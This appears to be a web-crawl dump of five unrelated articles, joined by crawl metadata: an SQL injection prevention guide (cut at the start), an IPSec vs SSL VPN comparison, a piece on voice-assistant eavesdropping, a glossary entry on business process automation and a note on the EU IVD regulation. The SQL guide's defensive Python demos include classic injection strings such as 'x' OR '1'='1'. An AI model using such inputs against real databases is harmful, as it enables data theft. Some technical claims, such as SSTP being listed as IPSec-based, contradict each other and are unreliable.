Once an application realizes that something in its system is exploitable for SQL injections, they need to patch the vulnerability. But if you’re not keeping track of these and don’t update applications, software, or plugins, then your site will still be susceptible to those attacks.
It’s crucial that you keep a close eye on your plugins, frameworks, server software, libraries, and everything else tied to your website. If there’s a new version, make sure you update it ASAP. Many times you’ll get a notification for updates, but other times you’ll need to do some digging.
Depending on the size of your organization and the number of programs it uses, you might need to consider investing in a patch management tool.
Step #4: Add Stored Procedures to Your Database
Stored procedures use variable binding to mitigate SQL injections. These procedures live in the database and connect to web applications.
While this won’t make your system completely impenetrable for SQL injections, it definitely helps. With that said, dynamic SQL generation can still bypass stored procedures.
So you should also harden your applications and operating system when you’re going through this step. Again, it’s not completely foolproof. But this extra effort makes it a little more challenging for SQL attacks to penetrate your hardened systems.
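The stored-procedure discipline can be sketched in Python. SQLite (used here so the example is self-contained) has no stored procedures, so a single fixed function stands in for one: all database access goes through predefined, parameterized operations, and the application never builds SQL strings itself. With a server database such as MySQL or PostgreSQL, the function body would typically call a real stored procedure via the driver's `cursor.callproc(...)` instead.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
conn.execute("INSERT INTO users (email) VALUES ('alice@example.com')")

def get_user_by_email(email: str):
    """Single, fixed entry point for this lookup.

    Mirrors a stored procedure: the operation is predefined and the
    input is bound as a parameter, never concatenated into the SQL.
    """
    cur = conn.execute(
        "SELECT id, email FROM users WHERE email = ?", (email,))
    return cur.fetchone()

print(get_user_by_email("alice@example.com"))  # (1, 'alice@example.com')
print(get_user_by_email("' OR '1'='1"))        # None: treated as data
```

Because the injection string is bound as data, it simply matches no rows instead of altering the query.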
Step #5: Leverage Parameterization and Prepared Statements
Similar to stored procedures, parameterization and prepared statements use variable binding to write database queries.
If you take the time to define all of the SQL code in each query, you’ll be able to tell the difference between code and user input.
Many web administrators use dynamic SQL coding techniques for added flexibility with application development. However, dynamic SQL could make databases treat certain code as instructions. So if malicious code is executed via an SQL injection, it could be a problem.
But if you stick with standard SQLs, databases won’t treat malicious statements as commands. Instead, they’ll just get inputted as data—limiting the potential impact of the injection.
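The difference between dynamic string-building and parameterization is easy to demonstrate with Python's built-in sqlite3 module (the table and payload here are made up for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (user TEXT, secret TEXT)")
conn.execute("INSERT INTO accounts VALUES ('alice', 's3cret')")

payload = "x' OR '1'='1"

# Vulnerable: the payload becomes part of the SQL instructions.
unsafe = conn.execute(
    "SELECT * FROM accounts WHERE user = '%s'" % payload).fetchall()
print(unsafe)  # [('alice', 's3cret')] -- every row leaks

# Safe: the payload is bound as data and matches nothing.
safe = conn.execute(
    "SELECT * FROM accounts WHERE user = ?", (payload,)).fetchall()
print(safe)    # []
```

The same query text with a bound parameter treats the attacker's input as an opaque value, which is exactly the behavior this step describes.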
Step #6: Use Firewalls
I highly recommend using a WAF (web application firewall). An appliance-based WAF is an excellent and easy way to filter malicious data from your site.
Many of the best WAF solutions on the market today have default systems in place that prevent SQL injections. You can also configure these tools to meet your specific needs.
Refer back to step 3 on patching. Your WAF can potentially double as a solution to help you with patching and update management.
These commonly come in two different forms.
- NGFW — Next-generation firewall
- FWaaS — Firewall-as-a-service
Some of the modern FWaaS solutions come with next-generation functionality. It’s also worth noting that an NGFW can be hosted in the cloud as well, meaning it can double as FWaaS.
ModSecurity is a popular free and open-source WAF. It has SQL injection prevention capabilities that detect and filter potentially malicious web requests.
Step #7: Create User Privileges and Tighten Up Access Controls
It’s in your best interest to create and enforce the policy of least privilege. Think about what would happen if your SQL databases were compromised. You can reduce these risks with these types of access policies.
That’s why we previously discussed the importance of using select statements for your databases. Accounts shouldn’t also have privileges to update, insert, or delete items, as these make your system more susceptible to malicious commands delivered via SQL injections.
With an access control policy, set up your database so that only users with administrative-level permissions can gain access. All other users should be automatically denied.
This way, if another user in your organization without admin-level access is compromised by an SQL attack, the attacker’s access will be limited.
You can take this one step further by configuring your database for read-only access. So if certain users without admin-level permissions need to use a database, they won’t have the ability to edit anything.
Again, if an attacker gains access to these types of credentials using an SQL injection, the database can’t be altered if the access is read-only.
Enforcing password policies is another way to harden your access controls. Beyond restricting access by user privileges, you can also reduce the chances of a breach by forcing users in your organization to protect their accounts.
Any default passwords should be changed immediately. You can also enforce password policies with minimum character lengths and complex character requirements for every account type. Set user passwords to expire on a regular basis, and force your team to continually update their accounts according to these policies.
Step #8: Eliminate User Accounts and Shared Databases
If multiple applications or websites are using the same shared database, it can be a disaster if you fall victim to a successful SQL injection. The same holds true for user accounts with access to multiple web apps.
While shared access might make things easier to complete tasks within your organization, it adds a significant risk for attacks.
Instead, make sure any connected servers have the least amount of access to the target server. Make sure these databases are structured, so they only have access to mission-critical information.
Each linked server should have its own unique login and account, separate from other processes on your target server.
Step #9: Limit Information in Errors and Encryption Policies
This is a big mistake that I see web administrators make all of the time: They divulge way too much information in error messages.
Attackers can figure out a ton of information about your database architecture simply by reading your error messages. By only including minimal information, you can prevent the unintentional exposure of your architecture secrets.
The best way to do this is with “RemoteOnly” customErrors or similar configurations. This means that a detailed error message will only be displayed on local machines that are verified and trusted. But if an external hacker attempts an SQL injection and gets an error, they’ll just see a basic error message that doesn’t display any further details.
This can help safeguard your account names, table names, internal database structure, and more—ultimately making it more difficult for an attacker trying to find weak links for an SQL injection.
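In application code, the same idea means catching database errors and returning only a generic message, while the detailed error goes to a server-side log. This sketch uses sqlite3 and a made-up table name; the pattern is what matters.

```python
import sqlite3

def run_query(conn, sql, params=()):
    """Execute a query without leaking database internals to the client.

    Full details belong in a server-side log only; callers see a generic
    message, analogous to the "RemoteOnly" behavior described above.
    """
    try:
        return conn.execute(sql, params).fetchall()
    except sqlite3.Error:
        # log.exception("query failed")  # detailed error, server-side only
        raise RuntimeError("An internal error occurred.") from None

conn = sqlite3.connect(":memory:")
try:
    run_query(conn, "SELECT * FROM no_such_table")
except RuntimeError as err:
    print(err)  # generic message; no table names are exposed
```

An attacker probing this endpoint learns nothing about the schema from the response.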
Using the same logic and thought process, you should also ensure your encryption keys are kept private as well.
Encryption is an excellent way to protect sensitive data while it’s in motion or in storage. But it’s useless if you’re not protecting your cryptography keys.
Make sure you really establish proper encryption and hashing policies. Otherwise, hackers can get their hands on the keys required to decrypt sensitive data and deploy an SQL injection.
Step #10: Deny Extended URLs
Many SQL injection attackers send extended URLs with the intention of causing server failure during login. This is a well-documented exploitation technique that triggers stack-based buffer overflows via long URLs.

Lots of web servers today are built to process large requests, including requests larger than 4096 bytes. But your web server software might not record these oversized requests in your log files. What does this mean?
An attacker could go under the radar and undetected with an SQL injection using extended URLs. A simple solution for this is to limit all URLs to 2048 bytes. Everything else will be denied by default.
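In application code, the same rule is a one-line check. Real deployments usually enforce this at the web server instead (for example via nginx's large_client_header_buffers directive); this sketch just makes the policy explicit.

```python
MAX_URL_BYTES = 2048

def accept_request(url: str) -> bool:
    """Reject oversized URLs before any further processing."""
    return len(url.encode("utf-8")) <= MAX_URL_BYTES

print(accept_request("https://example.com/login"))             # True
print(accept_request("https://example.com/?q=" + "A" * 5000))  # False
```

Anything over the limit is denied by default, closing off the extended-URL technique described above.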
Common Problems When Preventing SQL Injections
The steps above will definitely put you on the right track to preventing SQL injections. With that said, it’s common for some people to run across stumbling blocks or pain points when they’re going through this process.
I’ve identified the most common problems for SQL injection prevention and explained the solutions below.
Problem #1: SQL Injection Detection
Let’s say you’ve taken all of the steps in this guide to prevent SQL injection attacks. Now what?
Like many other attack types, SQL injections cannot be stopped and prevented 100% of the time. Even if you’re following all of the latest tips, security policies, and best practices, a newer or more sophisticated injection can still penetrate your site and database.
But unlike other types of attacks, SQL injections aren’t always obvious. It’s not like ransomware, which clearly shows when there has been a breach.
The best way to overcome this problem is with regular scans. I recommend using web vulnerability scanners, like Acunetix.
Acunetix gives you 90% of the scan results in minutes, allowing you to quickly identify any SQL injections, as well as other potential vulnerabilities. It automatically prioritizes your highest-risk vulnerabilities, so you know exactly what to fix first.
Problem #2: Assessing Weak Points
Using a tool to scan for vulnerabilities is great. However, you’ll still be playing a bit of catch-up if an SQL injection is detected.
Obviously, you’d rather stop the injection before it occurs. But how can you identify areas where you’re most vulnerable to an attack?
Running self-imposed attacks against your website or application is a viable option. Common SQL injection methods used for this include:
- In-band SQL Injections — One of the most popular classes of SQL injection attack, which can come in error-based or union-based form. The error-based method tests which queries produce error messages so attackers can map out the database structure. Union-based attacks use UNION statements to append extra query results to the page the application returns.
- Inferential SQL Injections — Also known as blind SQL attacks, these can be Boolean-based or time-based. The first method forces a web application to return different responses for true and false statements, which the attacker can interpret to reconstruct data. The latter sends queries that make the database pause for a specified amount of time. Both options force the attacker to decipher data one character at a time.
- Out-of-Band SQL Injections — These attacks aren’t as common. They rely on database servers making HTTP requests or DNS requests to deliver data to the hacker.
Rather than performing these attacks on your own, you can use penetration testing tools to assess weak points in your website or web applications.
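A defensive use of the error-based idea is to probe your own application (for example, by submitting a lone single quote) and scan the response body for raw database error messages. The signature list below is a small, hypothetical sample, not an exhaustive one:

```python
import re

# A few common database error signatures (illustrative, not exhaustive).
ERROR_SIGNATURES = [
    re.compile(p, re.IGNORECASE) for p in (
        r"you have an error in your sql syntax",  # MySQL
        r"unclosed quotation mark",               # SQL Server
        r"unterminated quoted string",            # PostgreSQL
        r"sqlite3?\.OperationalError",            # SQLite
    )
]

def looks_injectable(response_body: str) -> bool:
    """Heuristic: a page echoing a raw database error after a probe
    suggests user input is being concatenated into SQL."""
    return any(p.search(response_body) for p in ERROR_SIGNATURES)

print(looks_injectable("You have an error in your SQL syntax near ''"))  # True
print(looks_injectable("<h1>Login failed</h1>"))                         # False
```

A dedicated scanner or penetration-testing tool does this far more thoroughly, but the sketch shows the core check such tools perform.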
Problem #3: Continuous Monitoring and Audits
Preventing SQL injections is just one of the dozens of steps an organization must take to protect data and enforce cybersecurity policies.
So it’s common for organizations to follow these steps but then let the process fall by the wayside. This is a problem.
Instead, make sure you set reminders and assign responsibility to IT security members to review audit logs on a regular basis. This can coincide with your password policy updates and software patching that we discussed earlier.
It’s also in your best interest to go back and re-do some of the steps in this guide on a regular basis. For example, your access control policies might change over time, especially as your team scales and you add new tools. So you’ll need to assess those policies and user privileges to see if you’re still enforcing the best least privilege principles. | <urn:uuid:6c4309b2-3690-4c8a-afa1-7997a284149a> | CC-MAIN-2024-38 | https://nira.com/how-to-prevent-sql-injections/ | 2024-09-07T13:23:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00128.warc.gz | en | 0.906748 | 2,825 | 2.625 | 3 |
Plenty of other articles out there compare and contrast IPSec vs SSL VPNs from the perspective of a network admin who has to set them up. This article, however, will examine how major commercial VPN providers utilize SSL and IPSec in their consumer services, which are intended to provide access to the web and not a corporate network.
VPN protocols that use IPSec encryption include L2TP, IKEv2, and SSTP. OpenVPN is the most popular protocol that uses SSL encryption, specifically the OpenSSL library. SSL is used in some browser-based VPNs as well.
This article compares and contrasts IPSec vs SSL encryption from the VPN end-user standpoint.
The basics of VPN encryption
VPN encryption scrambles the contents of your internet traffic in such a way that it can only be un-scrambled (decrypted) using the correct key. Outgoing data is encrypted before it leaves your device. It’s then sent to the VPN server, which decrypts the data with the appropriate key. From there, your data is sent on to its destination, such as a website. The encryption prevents anyone who happens to intercept the data between you and the VPN server—internet service providers, government agencies, wifi hackers, etc—from being able to decipher the contents.
Incoming traffic goes through the same process in reverse. If data is coming from a website, it first goes to the VPN server. The VPN server encrypts the data, then sends it to your device. Your device then decrypts the data so you can view the website normally.
All of this ensures that VPN users’ internet data remains private and out of the hands of any unauthorized parties.
The differences between varying types of encryption include:
- Encryption strength, or the method and degree to which your data is scrambled
- How the encryption keys are managed and exchanged
- What interfaces, protocols, and ports they use
- What OSI layers they run on
- Ease of deployment
- Performance (read: speed)
What is IPSec and what is SSL?
- SSL (Secure Sockets Layer) operates at the application layer of the OSI model. It encrypts the data exchanged between the user’s browser and the web server.
- IPsec (Internet Protocol Security) secures internet communication at the network layer. It is a suite of protocols for encrypting and authenticating network traffic.
For a more detailed explanation of the two protocols, check out our in-depth guide on common types of encryption.
In short: Slight edge in favor of SSL.
IPSec connections require a pre-shared key to exist on both the client and the server in order to encrypt and send traffic to each other. A pre-shared key (PSK) is a piece of data — known only to the parties involved — that has been securely shared between the two computers before it needs to be used.
SSL VPNs don’t have this problem because they use public key cryptography to negotiate a handshake and securely exchange encryption keys. Public key cryptography, also known as asymmetric cryptography, uses a pair of keys for secure communication: a public key and a private key. Unlike symmetric cryptography, where the same key is used for both encryption and decryption, public key cryptography uses two different but mathematically related keys.
Despite this, TLS/SSL has a long list of its own vulnerabilities. These include Padding Oracle on Downgraded Legacy Encryption (POODLE), Browser Exploit Against SSL/TLS (BEAST), Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext (BREACH), and Heartbleed.
Some SSL VPNs allow untrusted, self-signed certificates and don’t verify clients. This is particularly common in “clientless” SSL VPN browser extensions. These VPNs that allow anyone to connect from any machine are vulnerable to man-in-the-middle (MITM) attacks. However, this is not the case with most native OpenVPN clients.
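Python's standard ssl module illustrates the difference: a default context enforces certificate-chain and hostname verification, while disabling those checks reproduces the permissive behavior of clients that accept untrusted, self-signed certificates.

```python
import ssl

# A default context verifies the server's certificate chain and hostname,
# which is what defeats the man-in-the-middle scenario described above.
strict = ssl.create_default_context()
print(strict.verify_mode == ssl.CERT_REQUIRED)  # True
print(strict.check_hostname)                    # True

# Disabling verification accepts any certificate, including self-signed
# ones -- convenient, but it removes the MITM protection.
lax = ssl.create_default_context()
lax.check_hostname = False  # must be disabled before changing verify_mode
lax.verify_mode = ssl.CERT_NONE
print(lax.verify_mode == ssl.CERT_NONE)         # True
```

Clientless browser VPNs that skip these checks are accepting exactly the `lax` configuration shown here.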
SSL typically requires more frequent patches to keep up to date, for both the server and client.
The lack of open-source code for IPSec-based VPN protocols may be a concern for people wary of government spies and snoopers. Open-source code allows anyone to examine it for vulnerabilities and suggest fixes. Closed-source code is maintained in-house and hidden from the end user.
In 2013, Edward Snowden revealed the US National Security Agency’s Bullrun program actively tried to “insert vulnerabilities into commercial encryption systems, IT systems, networks, and endpoint communications devices used by targets.” The NSA allegedly targeted IPSec to add backdoors and side channels that could be exploited by hackers.
In the end, strong security is more likely the result of skilled and mindful network administrators rather than choice of protocol.
Firewall traversal

In short: SSL-based VPNs are generally better for bypassing firewalls.
NAT firewalls often exist on wifi routers and other network hardware. To protect against threats, they throw out any internet traffic that isn’t recognized, which includes data packets without port numbers. Encrypted IPSec packets (ESP packets) have no port numbers assigned by default, which means they can get caught in NAT firewalls. This can prevent IPSec VPNs from working.
To get around this, many IPSec VPNs encapsulate ESP packets inside UDP packets, so that the data is assigned a UDP port number, usually UDP 4500. While this solves the NAT traversal problem, your network firewall may not allow packets on that port. Network administrators at hotels, airports, and other places may only allow traffic on a few required protocols, and UDP 4500 may not be among them.
SSL traffic can travel over port 443, which most devices recognize as the port used for secure HTTPS traffic. Almost all networks allow HTTPS traffic on port 443, so we can assume it’s open. OpenVPN uses port 1194 by default for UDP traffic, but it can be forwarded through either UDP or TCP ports, including TCP port 443. This makes SSL more useful for bypassing firewalls and other forms of censorship that block traffic based on ports.
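As an illustration of that workaround, an OpenVPN client can be pointed at TCP port 443 with two standard configuration directives (the hostname below is a placeholder, and the server must be configured to listen there):

```
# Run the tunnel over TCP on port 443 so it blends in with HTTPS traffic.
proto tcp
remote vpn.example.com 443
```

Because the traffic then looks like ordinary HTTPS to a port-based filter, it usually passes through restrictive networks.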
Speed and reliability
In short: Both are reasonably fast, but IKEv2/IPSec negotiates connections the fastest.
Most IPSec-based VPN protocols take longer to negotiate a connection than SSL-based protocols, but this isn’t the case with IKEv2/IPSec.
IKEv2 is an IPSec-based VPN protocol that’s been around for over a decade, but it’s now trending among VPN providers. Driving its deployment is its ability to quickly and reliably reconnect whenever the VPN connection is interrupted. This makes it especially useful for mobile iOS and Android clients that don’t have reliable connections or those that frequently switch between mobile data and wifi.
As for actual throughput, it’s a toss-up. We’ve seen arguments from both sides. In a blog post, NordVPN states that IKEv2/IPSec can offer faster throughput than rivals like OpenVPN. Both protocols typically use either the 128-bit or 256-bit AES cipher.
The extra UDP layer that many providers put on IPSec traffic to help it traverse firewalls adds extra overhead, which means it requires more resources to process. But most people won’t notice a difference.
On most consumer VPNs, throughput is determined largely by server and network congestion rather than the VPN protocol.
See also: Fastest VPNs
Ease of use
In short: IPSec is more universal, but most users who use VPN providers’ apps won’t notice a huge difference.
IKEv2 and L2TP are IPSec-based VPN protocols built into most major operating systems, and SSTP (which is SSL-based) is built into Windows, which means an extra application isn't necessarily required to get up and running. Most users of consumer VPNs will still use the provider's app to get connected, though.
SSL works by default in most web browsers, but a third-party application is usually necessary to use OpenVPN. Again, this is usually taken care of by the VPN provider’s app.
In our experience, IKEv2 tends to offer a more seamless experience than OpenVPN from an end-user standpoint. This is largely due to the fact that IKEv2 connects and handles interruptions quickly. That being said, OpenVPN tends to be more versatile and may be better suited to users who can’t accomplish what they want with IKEv2.
When it comes to corporate VPNs that provide access to a company network rather than the internet, the general consensus is that IPSec is preferable for site-to-site VPNs, and SSL is better for remote access. The reason is that IPSec operates at the Network Layer of the OSI model, which gives the user full access to the corporate network regardless of application. It is more difficult to restrict access to specific resources. SSL VPNs, on the other hand, enable enterprises to control remote access at a granular level to specific applications.
Network administrators who operate VPNs tend to find client management a lot easier and less time-consuming with SSL than with IPSec.
IPSec vs SSL VPNs: Conclusion
All in all, for VPN users who have both options, we recommend going for IKEv2/IPSec first, then turning to OpenVPN/SSL should any issues crop up. The speed at which IKEv2 is able to negotiate and establish connections will offer a more tangible quality-of-life improvement for the average, everyday VPN user, while offering comparable security and speed — but it may not work under all circumstances.
OpenVPN/SSL was until quite recently considered the best VPN combination for most users of consumer VPNs. OpenVPN, which uses the OpenSSL library for encryption and authentication, is reasonably fast, very secure, open source, and can traverse NAT firewalls. It can support either the UDP or TCP protocol.
IKEv2/IPSec presents a new challenger to OpenVPN, improving on L2TP and other IPSec-based protocols with faster connections, more stability, and built-in support on most newer consumer devices.
SSL and IPSec both boast strong security pedigrees with comparable throughput speed, security, and ease of use for most customers of commercial VPN services.
IPSec vs SSL VPNs FAQs
Do SSL VPNs hide IP addresses?
SSL VPNs can provide anonymity by hiding IP addresses, but they can also be configured to reveal IP addresses. It all depends on how the SSL VPN is configured. If you want complete anonymity, you'll need to make sure the SSL VPN is configured properly so that your activities don't leak to your ISP.
Nowadays the proverb “the walls have ears” is not as metaphoric as it used to be.
“The telescreen received and transmitted simultaneously. Any sound that Winston made, above the level of a very low whisper, would be picked up by it … There was of course no way of knowing whether you were being watched at any given moment.” That is George Orwell’s description of Big Brother’s spying devices in the novel 1984.
What if Big Brother weren’t the only one with access to the telescreen, though? What if pretty much anybody with the necessary skill set could listen in? And what if that screen were used not only for political propaganda, but also for displaying personalized ads: say, you complain to your spouse about a headache and immediately see a commercial for a painkiller? This is no longer a plot from a dystopian novel; it’s close to reality — a bit futuristic, but with a good chance of becoming real in the very near future.
We’ve already surrounded ourselves with budding telescreens, and their new features — such as voice assistants — are quite capable of becoming new threats.
Virtual assistants such as Apple Siri live in smartphones, tablets, and laptops, or in stationary devices like Amazon Echo or Google Home smart speakers. People use them to turn music on and off, check weather forecasts, adjust room temperature, order goods online, and do many other things.
Can these vigilant microphones do harm? Sure. The first possibility that comes to mind is the leaking of personal and corporate data. But here’s another one that is even easier for cybercriminals to turn into money: Do you dictate your credit card numbers and one-time passwords to fill in forms on websites?
Smart speakers can interpret voices even in noisy surroundings or with music playing. You don't even need to speak very clearly to be understood: in my experience, Google's voice assistant on a common Android tablet sometimes understands 3-year-old children better than it understands their parents.
Here are a few stories that might seem funny and alarming at the same time. All of them involve different voice assistants and smart gadgets. Sci-fi writers have long dreamed about machines we can talk to, but even they couldn't have imagined these situations from real life.
The speaker rebellion
In January 2017, San Diego, California, channel CW6 aired an interesting news segment about the vulnerabilities of Amazon Echo speakers (equipped with the Alexa virtual assistant).
The system is unable to differentiate people by voice, the show hosts explained, which means Alexa will follow the orders of anybody who is around. As a result, little kids started making unplanned online purchases, not knowing the difference between asking their parents to give them a snack and asking Alexa to give them a toy.
Then one of the hosts said on air: "I love the little girl saying, 'Alexa, order me a dollhouse.'" The complaints began rolling in. People all over San Diego reported spontaneous purchases of dollhouses made by their voice assistants. Alexa heard a line uttered on television as a command and swiftly fulfilled it.
Amazon assured the victims of “AI rebellion” they could cancel their orders and not have to pay.
Gadgets under oath
Gadgets that can listen are valuable to law enforcement agencies because they can (typically) repeat anything they've heard. Here's a detective story that happened in Arkansas in 2015.
Four men had a party. They watched football, drank, relaxed in the hot tub — nothing out of the ordinary. The next morning, the owner of the house found the lifeless body of one of the guests in the tub. He quickly became the number one suspect; the other guests said they had left the party before anything happened.
Detectives noticed a lot of smart devices in the home: lighting and security systems, a weather station — and an Amazon Echo. The police decided to question it. Detectives hoped to get voice recordings made on the night of the murder. They asked Amazon to share the data, but the company allegedly refused.
Amazon developers claim that Echo doesn’t record sounds all the time, only when the user pronounces the wake-up word — by default, Alexa. Then the command is stored on the company’s servers for a limited time. Amazon claims it stores commands only to improve customer service, and users can manually delete all records in their account settings.
Anyway, detectives found another device from which to gather clues. They entered into evidence the testimony of a … smart water meter. In the early-morning hours after the victim’s death, an exorbitant amount of water was apparently used. The house owner claimed that he was already asleep at that time. Investigators suspected that water was used to clean up blood.
It's noteworthy that the smart meter's readings seem to be inaccurate. In addition to the very high water usage in the middle of the night, it reported water consumption of no more than 40 liters per hour on the day of the party, but you don't fill a hot tub at those rates. The accused owner gave an interview to StopSmartMeters.org (yes, a website created by opponents of smart meters); he suggested that the clock on the meter was set incorrectly.
The case goes to court this year.
Virtual assistants in movies
Modern mass culture also treats virtual assistants with suspicion. For example, in the movie Passengers, the android bartender Arthur reveals Jim Preston’s secret and damages his reputation in the eyes of his companion, Aurora. In Why Him? voice assistant Justine eavesdrops on a telephone call of the protagonist, Ned Fleming, and rats him out.
The car as a wiretap
Forbes also reports a few interesting cases of electronic devices being used against their owners.
In 2001, the FBI got permission from a Nevada court to request ATX Technologies' help in intercepting communications in a private car. ATX Technologies develops and manages in-car assistance systems that enable car owners to request help in the event of a traffic accident.
The company complied with the request. Unfortunately, technical details were not published, except for the FBI's demand that such surveillance be carried out with "a minimum of interference" to the quality of services provided to the suspect. It seems quite possible that the eavesdropping was carried out over the emergency line, with the car's microphone turned on remotely.
A similar story took place in 2007 in Louisiana. A driver or passenger accidentally pressed the hotline button and called the OnStar emergency service. The operator answered the call. Receiving no response, she notified the police. Then she tried once more to reach the possible victims and heard dialogue that sounded like a part of a drug deal. The operator let the police officer listen in and pinpointed the car’s location. As a result, police stopped the car and found marijuana inside.
In the latter case, the driver’s defense tried to invalidate the police evidence because there was no warrant, but the court rejected this argument because the police did not initiate the wiretap. The suspect had bought the car from a previous owner a few months before the incident and probably didn’t know about the emergency feature. He was ultimately found guilty.
How to stay off the air
In January, at CES 2017 Las Vegas, almost every smart thing presented — from cars to refrigerators — was equipped with a virtual assistant. This trend will surely create new privacy, security, and even physical safety risks.
Every developer needs to make users’ security a top priority. As for ordinary consumers, we have a few tips to help them protect their lives from the all-hearing ears.
- Turn off the microphone on Amazon Echo and Google speakers. There’s a button. It’s not a particularly convenient way to ensure privacy — you will always have to remember to neutralize the assistant — but at least it’s something.
- Use Echo’s account settings to prohibit or password-protect purchasing.
- Use antivirus protection on PCs, tablets, and smartphones to decrease the risk of data leaks and to keep criminals out.
- Change Amazon Echo’s wake word if someone in your household has a name that sounds like “Alexa.” Otherwise any dialogue near the device has the potential to turn into a real nuisance.
That’s not a one-way street
Okay, you taped over the webcam on your laptop, hid your smartphone under a pillow, and threw your Echo away. You feel safe from digital eavesdroppers now … but you’re not. Researchers from Ben-Gurion University (Israel) explain that even common earphones can be turned into listening devices.
- Earphones and passive loudspeakers are basically inside-out microphones. That means every earphone set connected to a PC can detect sound.
- Some audio chipsets can change the function of an audio port at the software level. This is not a secret — it is stated in the motherboard specifications.
As a result, cybercriminals can turn your earphones into a wiretapping device to secretly record sound and send it to their servers via the Internet. Field studies proved it: In this way, one can record at acceptable quality a conversation taking place several meters away. Consider that people often keep their earphones quite a bit closer, resting them on their necks or on a nearby table.
To protect yourself from this style of attack, use active loudspeakers instead of passive earphones and speakers. Active speakers have a built-in amplifier between the jack and the speaker that stops a signal from coming back to the input side. | <urn:uuid:62d90845-129e-41c7-a5d7-76b329947dda> | CC-MAIN-2024-38 | https://usa.kaspersky.com/blog/voice-recognition-threats/10855/ | 2024-09-11T02:50:06Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00728.warc.gz | en | 0.961781 | 2,014 | 2.703125 | 3 |
Business process automation is an approach that reduces the dependency on individual task executions in core business processes. Software-based tools are used to help organizations reallocate resources, reduce bottlenecks and drive new efficiencies.
Common use cases include:
Historically, automation has been used to complete simple, repetitive tasks. But business process automation refers to increasingly complex use cases, including multistep digital tasks, organizing and understanding unstructured data, and communicating using human language.
IT management is one area where business process automation can help organizations maximize resources to focus on initiatives that help grow the business. Many IT tasks, from managing networks and provisioning resources to developing applications, can be automated to help organizations improve operations. | <urn:uuid:c38761bc-a7be-4285-8992-a0700a9f2de5> | CC-MAIN-2024-38 | https://prod-b2b.insight.com/en_US/content-and-resources/glossary/b/business-process-automation.html | 2024-09-13T13:53:35Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00528.warc.gz | en | 0.908657 | 145 | 2.53125 | 3 |
October 26, 2017
In vitro literally refers to a test or examination performed outside a living organism, whether in a laboratory, in a vessel, or in another controlled testing location. In vitro diagnostic medical devices (IVDs) comprise chemical reagents, instruments, and systems intended for analyzing samples and diagnosing a disease or other medical condition. These IVD devices help determine the health condition of the patient in order to treat, mitigate, cure, or prevent a disease in the first place.
Access to the supplier market for in vitro diagnostic medical devices (IVDs), device application, and market performance is regulated through European Directive 98/79/EC (IVDD). The IVDD applies across the member states of the European Union and, as a result, is enforced in the UK. The new regulation, the In Vitro Diagnostic Device Regulation (IVDR) 2017/746, was published in the Official Journal of the European Union on 5 May 2017 to keep pace with continuous scientific and technological advancement.
The IVDR presents a new device classification system which aligns with the Global Harmonization Task Force (GHTF) classification guidelines and is now risk-based, a change that will affect all suppliers of IVDs. Although not directly referenced, ISO 13485 can help. Some of the important outputs of the new regulation are:
1) Risk-based classification: The involvement of notified bodies in device and company audits will be based on the class of the device.
The conformity process for negligible-risk (Class A) devices will not require the involvement of notified bodies (organizations designated by the MHRA for assessment), and implementation of ISO 13485 will help fulfill the regulation's requirements. Devices in Classes B, C, and D carry increasing risk levels, respectively, and all of these classes will require a notified body to assess the product's conformity.
2) Unique Device Identification: Suppliers must make their devices traceable and identifiable with a Unique Device Identification (UDI) system. ISO 13485:2016 also addresses the same concern, in Clause 7.5.8 which requires a company to document a system for unique device identification. Thus, companies meeting the requirements of ISO 13485:2016 will already have this part of the regulation addressed.
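As a rough illustration of what machine-readable device identification looks like, the sketch below parses the human-readable form of a GS1-style UDI string. The specific GTIN, lot, and serial values are made up, and real UDI carriers also include HIBCC and ICCBBA formats, so treat this as a toy example only.

```python
import re

# Toy parser for the human-readable form of a GS1-style UDI label,
# e.g. "(01)00844588003288(17)261231(10)A1B2(21)1234".
# The digits in parentheses are GS1 application identifiers (AIs).
AI_NAMES = {
    "01": "device identifier (GTIN)",
    "17": "expiration date (YYMMDD)",
    "10": "lot/batch",
    "21": "serial number",
}

def parse_udi(label: str) -> dict:
    fields = {}
    # Capture each "(AI)value" pair; values run until the next "(".
    for ai, value in re.findall(r"\((\d{2})\)([^()]+)", label):
        fields[AI_NAMES.get(ai, f"AI {ai}")] = value
    return fields

print(parse_udi("(01)00844588003288(17)261231(10)A1B2(21)1234"))
```

Splitting the label into a stable device identifier plus production data (lot, serial, expiry) is what makes a device traceable through the supply chain.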
3) Public Display of Summary for Device Safety: Companies providing Class C and Class D (high-risk) devices will have to create a summary of device safety considerations and application details, such as clinical data. This summary must be made available to the public. ISO 13485 also requires organizations to conduct clinical trials under design validation protocols, while ISO 13485 together with ISO 14971 helps organizations perform risk management. Therefore, conforming with these standards will help organizations effectively create such summaries.
4) Performance evaluation report: Suppliers will also have to establish conformity with the overall safety and performance criteria for IVDs. They must submit a performance evaluation report based on the level of risk and the associated class. Again, systems designed around ISO 13485 can help in preparing such reports through risk registers, complaint handling, and reporting of adverse events.
5) Observance and market surveillance: The new regulation will lead all member states to have an electronic portal where suppliers can submit adverse incident reports, field safety corrective actions, field safety notices (FSNs), and summary reports at planned intervals. The MHRA already offers electronic adverse event reporting in the UK. ISO 13485:2016 helps with almost all of these requirements: it encompasses reporting of adverse events to a regulatory body, taking corrective actions, issuing advisory notices, and so on. The only thing suppliers have to do is connect these systems to the regulatory body's input stream.
6) Notified Bodies: The status of notified bodies with respect to manufacturers and suppliers will be considerably reinforced. Notified bodies will have the privilege and obligation to conduct unscheduled factory inspections and to carry out laboratory tests or physical examinations on IVDs. The regulation also requires rotation of the notified body's IVD inspectors at suitable intervals. This creates a balance in the understanding and knowledge needed to conduct comprehensive assessments. Implementing ISO 13485 makes a manufacturer's life easier in the event of an inspection, i.e., it gives them the ability to address many of the inspection's concerns.
7) Schedule for transition to the new regulation: The new regulation was issued on 5 May 2017 and entered into force on 25 May 2017. The IVDR will apply fully five years after the entry-into-force date, which means companies have five years to transition to the new regulatory requirements.
